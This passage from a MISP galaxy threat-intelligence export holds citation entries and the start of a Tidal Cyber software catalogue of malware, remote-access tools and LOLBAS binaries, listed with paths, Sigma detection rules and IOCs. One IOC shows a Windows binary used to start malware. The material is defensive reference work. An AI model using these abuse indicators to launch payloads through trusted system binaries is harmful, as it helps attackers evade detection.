The tag is: misp-galaxy:references="Microsoft xp_cmdshell 2017"

Table 16223. Table References

Links

https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017

Microsoft XSLT Script Mar 2017

Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using <msxsl:script>. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Microsoft XSLT Script Mar 2017"

Table 16224. Table References

Links

https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script

Xwizard.exe - LOLBAS Project

LOLBAS. (2018, May 25). Xwizard.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Xwizard.exe - LOLBAS Project"

Table 16225. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Xwizard/

Linux kernel Yama

Linux Kernel Archives. (n.d.). Yama Documentation - ptrace_scope. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Linux kernel Yama"

Table 16226. Table References

Links

https://www.kernel.org/doc/Documentation/security/Yama.txt

Mandiant APT29 Microsoft 365 2022

Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.

The tag is: misp-galaxy:references="Mandiant APT29 Microsoft 365 2022"

Table 16227. Table References

Links

https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft

BlackHat Mac OSX Rootkit

Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven’t known yet. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="BlackHat Mac OSX Rootkit"

Table 16228. Table References

Links

http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf

Malwarebytes DarkComet March 2018

Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Malwarebytes DarkComet March 2018"

Table 16229. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

FireEye Mail CDS 2018

Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="FireEye Mail CDS 2018"

Table 16230. Table References

Links

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf

US District Court Indictment GRU Unit 74455 October 2020

Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al. Retrieved November 25, 2020.

The tag is: misp-galaxy:references="US District Court Indictment GRU Unit 74455 October 2020"

Table 16231. Table References

Links

https://www.justice.gov/opa/press-release/file/1328521/download

Sophos ZeroAccess

Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.

The tag is: misp-galaxy:references="Sophos ZeroAccess"

Table 16232. Table References

Links

https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf

Mandiant MOVEit Transfer June 2 2023

Nader Zaveri, Jeremy Kennelly, Genevieve Stark, Matthew Mcwhirt, Dan Nutting, Kimberly Goody, Justin Moore, Joe Pisano, Zander Work, Peter Ukhanov, Juraj Sucik, Will Silverstone, Zach Schramm, Greg Blaum, Ollie Styles, Nicholas Bennett, Josh Murchie. (2023, June 2). Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft. Retrieved June 16, 2023.

The tag is: misp-galaxy:references="Mandiant MOVEit Transfer June 2 2023"

Table 16233. Table References

Links

https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft

Kaspersky RTLO Cyber Crime

Firsh, A. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Kaspersky RTLO Cyber Crime"

Table 16234. Table References

Links

https://securelist.com/zero-day-vulnerability-in-telegram/83800/

DOJ APT10 Dec 2018

United States District Court Southern District of New York (USDC SDNY). (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="DOJ APT10 Dec 2018"

Table 16235. Table References

Links

https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion

District Court of NY APT10 Indictment December 2018

US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="District Court of NY APT10 Indictment December 2018"

Table 16236. Table References

Links

https://www.justice.gov/opa/page/file/1122671/download

Zipfldr.dll - LOLBAS Project

LOLBAS. (2018, May 25). Zipfldr.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Zipfldr.dll - LOLBAS Project"

Table 16237. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/

Zlib Github

madler. (2017). zlib. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="Zlib Github"

Table 16238. Table References

Links

https://github.com/madler/zlib

Microsoft Zone.Identifier 2020

Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Microsoft Zone.Identifier 2020"

Table 16239. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8

Sysdig Kinsing November 2020

Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Sysdig Kinsing November 2020"

Table 16240. Table References

Links

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

Tidal Software

Tidal Software Cluster.

Tidal Software is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

3PARA RAT

[3PARA RAT](https://app.tidalcyber.com/software/71d76208-c465-4447-8d6e-c54f142b65a4) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:software="3PARA RAT"

4H RAT

The tag is: misp-galaxy:software="4H RAT"

7-zip - Associated Software

The tag is: misp-galaxy:software="7-zip - Associated Software"

7-Zip

7-Zip is a tool used to compress files into an archive.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="7-Zip"

AADInternals

[AADInternals](https://app.tidalcyber.com/software/3d33fbf5-c21e-4587-ba31-9aeec3cc10c0) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.<sup>[[AADInternals Github](https://app.tidalcyber.com/references/643d3947-c0ec-47c4-bb58-5e546084433c)]</sup><sup>[[AADInternals Documentation](https://app.tidalcyber.com/references/320231a1-4dbe-4eaa-b14d-48de738ba697)]</sup>

The tag is: misp-galaxy:software="AADInternals"

ABK

The tag is: misp-galaxy:software="ABK"

AccCheckConsole.exe - Associated Software

<sup>[[AccCheckConsole.exe - LOLBAS Project](/references/de5523bd-e735-4751-84e9-a1be1d2980ec)]</sup>

The tag is: misp-galaxy:software="AccCheckConsole.exe - Associated Software"

AccCheckConsole

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Verifies UI accessibility requirements

Author: bohops

Paths:

* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe

Detection:

* Sigma: [proc_creation_win_lolbin_susp_acccheckconsole.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml)
* IOC: Sysmon Event ID 1 - Process Creation
* Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340<sup>[[AccCheckConsole.exe - LOLBAS Project](/references/de5523bd-e735-4751-84e9-a1be1d2980ec)]</sup>

The tag is: misp-galaxy:software="AccCheckConsole"

AccountRestore

AccountRestore is a .NET executable that is used to brute force Active Directory accounts. The tool searches for a list of specific users and attempts to brute force the accounts based on a password file provided by the user.<sup>[[Security Joes Sockbot March 09 2022](/references/bca2b5c2-bc3b-4504-806e-5c5b6fee96e6)]</sup>

The tag is: misp-galaxy:software="AccountRestore"

Action RAT

[Action RAT](https://app.tidalcyber.com/software/202781a3-d481-4984-9e5a-31caafc20135) is a remote access tool written in Delphi that has been used by [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) since at least December 2021 against Indian and Afghani government personnel.<sup>[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]</sup>

The tag is: misp-galaxy:software="Action RAT"

AddinUtil.exe - Associated Software

<sup>[[AddinUtil.exe - LOLBAS Project](/references/91af546d-0a56-4c17-b292-6257943a8aba)]</sup>

The tag is: misp-galaxy:software="AddinUtil.exe - Associated Software"

AddinUtil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: .NET Tool used for updating cache files for Microsoft Office Add-Ins.

Author: Michael McKinley @MckinleyMike

Paths:

* C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

Detection:

* Sigma: [proc_creation_win_addinutil_suspicious_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml)
* Sigma: [proc_creation_win_addinutil_uncommon_child_process.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml)
* Sigma: [proc_creation_win_addinutil_uncommon_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml)
* Sigma: proc_creation_win_addinutil_uncommon_dir_exec.yml<sup>[[AddinUtil.exe - LOLBAS Project](/references/91af546d-0a56-4c17-b292-6257943a8aba)]</sup>

The tag is: misp-galaxy:software="AddinUtil"

AdFind

[AdFind](https://app.tidalcyber.com/software/70559096-2a6b-4388-97e6-c2b16f3be78e) is a free command-line query tool that can be used for gathering information from Active Directory.<sup>[[Red Canary Hospital Thwarted Ryuk October 2020](https://app.tidalcyber.com/references/ae5d4c47-54c9-4f7b-9357-88036c524217)]</sup><sup>[[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]</sup><sup>[[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]</sup>

The tag is: misp-galaxy:software="AdFind"

adplus.exe - Associated Software

<sup>[[adplus.exe - LOLBAS Project](/references/d407ca0a-7ace-4dc5-947d-69a1e5a1d459)]</sup>

The tag is: misp-galaxy:software="adplus.exe - Associated Software"

adplus

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging tool included with Windows Debugging Tools

Author: mr.d0x

Paths:

* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe

Detection:

* Sigma: [proc_creation_win_lolbin_adplus.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml)
* IOC: As a Windows SDK binary, execution on a system may be suspicious<sup>[[adplus.exe - LOLBAS Project](/references/d407ca0a-7ace-4dc5-947d-69a1e5a1d459)]</sup>

The tag is: misp-galaxy:software="adplus"

Advanced IP Scanner

Advanced IP Scanner is a tool used to perform network scans and show network devices.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Advanced IP Scanner"

Advanced Port Scanner

Advanced Port Scanner is a tool used to perform network scans.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Advanced Port Scanner"

AdvancedRun

AdvancedRun is a tool used to enable software execution under user-defined settings.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="AdvancedRun"

Advpack.dll - Associated Software

<sup>[[Advpack.dll - LOLBAS Project](/references/837ccb3c-316d-4d96-8a33-b5df40870aba)]</sup>

The tag is: misp-galaxy:software="Advpack.dll - Associated Software"

Advpack

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Utility for installing software and drivers with rundll32.exe

Author: LOLBAS Team

Paths:
* c:\windows\system32\advpack.dll
* c:\windows\syswow64\advpack.dll

Detection:
* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)
* Splunk: detect_rundll32_application_control_bypass_advpack.yml<sup>[[Advpack.dll - LOLBAS Project](/references/837ccb3c-316d-4d96-8a33-b5df40870aba)]</sup>

The tag is: misp-galaxy:software="Advpack"

AZZY - Associated Software

The tag is: misp-galaxy:software="AZZY - Associated Software"

EVILTOSS - Associated Software

The tag is: misp-galaxy:software="EVILTOSS - Associated Software"

NETUI - Associated Software

The tag is: misp-galaxy:software="NETUI - Associated Software"

Sedreco - Associated Software

The tag is: misp-galaxy:software="Sedreco - Associated Software"

ADVSTORESHELL

[ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee) is a spying backdoor that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. <sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup> <sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup>

The tag is: misp-galaxy:software="ADVSTORESHELL"

Agent.btz

[Agent.btz](https://app.tidalcyber.com/software/f27c9a91-c618-40c6-837d-089ba4d80f45) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. <sup>[[Securelist Agent.btz](https://app.tidalcyber.com/references/3b876c56-1d18-49e3-9a96-5cee4af7ab72)]</sup>

The tag is: misp-galaxy:software="Agent.btz"

AgentExecutor.exe - Associated Software

<sup>[[AgentExecutor.exe - LOLBAS Project](/references/633d7f25-df9d-4619-9aa9-92d1d9d225d7)]</sup>

The tag is: misp-galaxy:software="AgentExecutor.exe - Associated Software"

AgentExecutor

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Intune Management Extension included on Intune Managed Devices

Author: Eleftherios Panos

Paths:
* C:\Program Files (x86)\Microsoft Intune Management Extension

Detection:
* Sigma: [proc_creation_win_lolbin_agentexecutor.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml)
* Sigma: proc_creation_win_lolbin_agentexecutor_susp_usage.yml<sup>[[AgentExecutor.exe - LOLBAS Project](/references/633d7f25-df9d-4619-9aa9-92d1d9d225d7)]</sup>

The tag is: misp-galaxy:software="AgentExecutor"

Agent Tesla

[Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.<sup>[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)]</sup><sup>[[Bitdefender Agent Tesla April 2020](https://app.tidalcyber.com/references/e3d932fc-0148-43b9-bcc7-971dd7ba3bf8)]</sup><sup>[[Malwarebytes Agent Tesla April 2020](https://app.tidalcyber.com/references/87f4fe4c-54cd-40a7-938b-6e6f6d2efbea)]</sup>

The tag is: misp-galaxy:software="Agent Tesla"

Amadey

[Amadey](https://app.tidalcyber.com/software/f173ec20-ef40-436b-a859-fef017e1e767) is a Trojan bot that has been used since at least October 2018.<sup>[[Korean FSI TA505 2020](https://app.tidalcyber.com/references/d4e2c109-341c-45b3-9d41-3eb980724524)]</sup><sup>[[BlackBerry Amadey 2020](https://app.tidalcyber.com/references/21b7a7c7-55a2-4235-ba11-d34ba68d1bf5)]</sup>

The tag is: misp-galaxy:software="Amadey"

Anchor_DNS - Associated Software

The tag is: misp-galaxy:software="Anchor_DNS - Associated Software"

Anchor

[Anchor](https://app.tidalcyber.com/software/9521c535-1043-4b82-ba5d-e5eaeca500ee) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) on selected high profile targets since at least 2018.<sup>[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)]</sup><sup>[[Medium Anchor DNS July 2020](https://app.tidalcyber.com/references/de246d53-385f-44be-bf0f-25a76442b835)]</sup>

The tag is: misp-galaxy:software="Anchor"

ANDROMEDA

[ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) is commodity malware that was widespread in the early 2010’s and continues to be observed in infections across a wide variety of industries. During the 2022 [C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) campaign, threat actors re-registered expired [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) C2 domains to spread malware to select targets in Ukraine.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="ANDROMEDA"

AnyDesk

AnyDesk is a tool used to enable remote connections to network devices.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="AnyDesk"

AppInstaller.exe - Associated Software

<sup>[[AppInstaller.exe - LOLBAS Project](/references/9a777e7c-e76c-465c-8b45-67503e715f7e)]</sup>

The tag is: misp-galaxy:software="AppInstaller.exe - Associated Software"

AppInstaller

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool used for installation of AppX/MSIX applications on Windows 10

Author: Wade Hickey

Paths:
* C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Detection:
* Sigma: dns_query_win_lolbin_appinstaller.yml<sup>[[AppInstaller.exe - LOLBAS Project](/references/9a777e7c-e76c-465c-8b45-67503e715f7e)]</sup>

The tag is: misp-galaxy:software="AppInstaller"

AppleJeus

[AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) has been used to distribute the [FALLCHILL](https://app.tidalcyber.com/software/ea47f1fd-0171-4254-8c92-92b7a5eec5e1) RAT.<sup>[[CISA AppleJeus Feb 2021](https://app.tidalcyber.com/references/6873e14d-eba4-4e3c-9ccf-cec1d760f0be)]</sup>

The tag is: misp-galaxy:software="AppleJeus"

AppleSeed

[AppleSeed](https://app.tidalcyber.com/software/9df2e42e-b454-46ea-b50d-2f7d999f3d42) is a backdoor that has been used by [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) to target South Korean government, academic, and commercial targets since at least 2021.<sup>[[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]</sup>

The tag is: misp-galaxy:software="AppleSeed"

Appvlp.exe - Associated Software

<sup>[[Appvlp.exe - LOLBAS Project](/references/b0afe3e8-9f1d-4295-8811-8dfbe993c337)]</sup>

The tag is: misp-galaxy:software="Appvlp.exe - Associated Software"

Appvlp

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Application Virtualization Utility Included with Microsoft Office 2016

Author: Oddvar Moe

Paths:
* C:\Program Files\Microsoft Office\root\client\appvlp.exe
* C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe

Detection:
* Sigma: proc_creation_win_lolbin_appvlp.yml<sup>[[Appvlp.exe - LOLBAS Project](/references/b0afe3e8-9f1d-4295-8811-8dfbe993c337)]</sup>

The tag is: misp-galaxy:software="Appvlp"

Aria-body

The tag is: misp-galaxy:software="Aria-body"

arp.exe - Associated Software

The tag is: misp-galaxy:software="arp.exe - Associated Software"

Arp

[Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) displays and modifies information about a system’s Address Resolution Protocol (ARP) cache. <sup>[[TechNet Arp](https://app.tidalcyber.com/references/7714222e-8046-4884-b460-493d9ef46305)]</sup>

The tag is: misp-galaxy:software="Arp"

Aspnet_Compiler.exe - Associated Software

<sup>[[Aspnet_Compiler.exe - LOLBAS Project](/references/15864c56-115e-4163-b816-03bdb9bfd5c5)]</sup>

The tag is: misp-galaxy:software="Aspnet_Compiler.exe - Associated Software"

Aspnet_Compiler

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: ASP.NET Compilation Tool

Author: Jimmy (@bohops)

Paths:
* c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
* c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

The tag is: misp-galaxy:software="Aspnet_Compiler"

ASPXTool - Associated Software

The tag is: misp-galaxy:software="ASPXTool - Associated Software"

ASPXSpy

[ASPXSpy](https://app.tidalcyber.com/software/a0cce010-9158-45e5-978a-f002e5c31a03) is a Web shell. It has been modified by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) actors to create the ASPXTool version. <sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup>

The tag is: misp-galaxy:software="ASPXSpy"

Guildma - Associated Software

<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Guildma - Associated Software"

Astaroth

[Astaroth](https://app.tidalcyber.com/software/ea719a35-cbe9-4503-873d-164f68ab4544) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. <sup>[[Cybereason Astaroth Feb 2019](https://app.tidalcyber.com/references/eb4dc1f8-c6e7-4d6c-9258-b03a0ae64d2e)]</sup><sup>[[Cofense Astaroth Sept 2018](https://app.tidalcyber.com/references/d316c581-646d-48e7-956e-34e2f957c67d)]</sup><sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Astaroth"

AsyncRAT

[AsyncRAT](https://app.tidalcyber.com/software/d587efff-4699-51c7-a4cc-bdbd1b302ed4) is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.<sup>[[Morphisec Snip3 May 2021](https://app.tidalcyber.com/references/abe44c50-8347-5c98-8b04-d41afbe59d4c)]</sup><sup>[[Cisco Operation Layover September 2021](https://app.tidalcyber.com/references/f19b4bd5-99f9-54c0-bffe-cc9c052aea12)]</sup><sup>[[Telefonica Snip3 December 2021](https://app.tidalcyber.com/references/f026dd44-1491-505b-8a8a-e4f28c6cd6a7)]</sup>

The tag is: misp-galaxy:software="AsyncRAT"

at.exe - Associated Software

The tag is: misp-galaxy:software="at.exe - Associated Software"

at

The tag is: misp-galaxy:software="at"

Atbroker.exe - Associated Software

<sup>[[Atbroker.exe - LOLBAS Project](/references/b0c21b56-6591-49c3-8e67-328ddb7b436d)]</sup>

The tag is: misp-galaxy:software="Atbroker.exe - Associated Software"

Atbroker

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Helper binary for Assistive Technology (AT)

Author: Oddvar Moe

Paths:
* C:\Windows\System32\Atbroker.exe
* C:\Windows\SysWOW64\Atbroker.exe

Detection:
* Sigma: [proc_creation_win_lolbin_susp_atbroker.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml)
* Sigma: [registry_event_susp_atbroker_change.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml)
* IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
* IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
* IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware<sup>[[Atbroker.exe - LOLBAS Project](/references/b0c21b56-6591-49c3-8e67-328ddb7b436d)]</sup>

The tag is: misp-galaxy:software="Atbroker"

Atera Agent

Atera Agent is a legitimate remote administration tool (specifically a remote management and maintenance ("RMM") solution) that adversaries have used as a command and control tool for remote code execution, tool ingress, and persisting in victim environments.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The tag is: misp-galaxy:software="Atera Agent"

Attor

[Attor](https://app.tidalcyber.com/software/89c35e9f-b435-4f58-9073-f24c1ee8754f) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://app.tidalcyber.com/software/89c35e9f-b435-4f58-9073-f24c1ee8754f) has a loadable plugin architecture to customize functionality for specific targets.<sup>[[ESET Attor Oct 2019](https://app.tidalcyber.com/references/fdd57c56-d989-4a6f-8cc5-5b3713605dec)]</sup>

The tag is: misp-galaxy:software="Attor"

Roptimizer - Associated Software

The tag is: misp-galaxy:software="Roptimizer - Associated Software"

AuditCred

[AuditCred](https://app.tidalcyber.com/software/d0c25f14-5eb3-40c1-a890-2ab1349dff53) is a malicious DLL that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) during their 2018 attacks.<sup>[[TrendMicro Lazarus Nov 2018](https://app.tidalcyber.com/references/4c697316-c13a-4243-be18-c0e059e4168c)]</sup>

The tag is: misp-galaxy:software="AuditCred"

AutoIt backdoor

[AutoIt backdoor](https://app.tidalcyber.com/software/3f927596-5219-49eb-bd0d-57068b0e04ed) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.

The tag is: misp-galaxy:software="AutoIt backdoor"

AuTo Stealer

